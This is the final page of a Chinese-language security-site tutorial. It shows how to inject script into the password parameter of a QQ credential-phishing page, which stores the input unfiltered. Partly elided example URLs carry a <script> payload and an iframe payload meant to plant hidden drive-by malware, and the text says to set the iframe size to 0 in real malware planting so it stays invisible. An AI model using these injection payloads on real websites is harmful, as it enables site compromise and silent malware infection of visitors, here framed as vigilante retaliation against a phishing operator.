这就证明了QQNumber=123&QQPassWord=123这两个我们是可以自己定义的..如果我们写入的不是数字..而且一段脚本代码呢?会不会执行呢..让我们来试下
http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=< ... quot;fhod")</script>
图12
插入代码成功...我们来看下
http://www.ciker.org/soft/q7.txt的源文件又是什么样的..
图13
再次证明对提交的数据是无任何限制的...我们完全可以自己发挥想象.插入任何代码都可以...
如果想反挂马的话..我们就可以提交以下数据
http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=<iframe%20&# ... 20width=480%20height=480></iframe>
图14
当然我这里把width和height设置为480只是为了方便演示..实际挂马中要改为0
好了..现在我们就可以给作者一个惊喜去了..图15
上一页 1 2 3 4 |
安全中国首页 > 文章中心 > Q Q技巧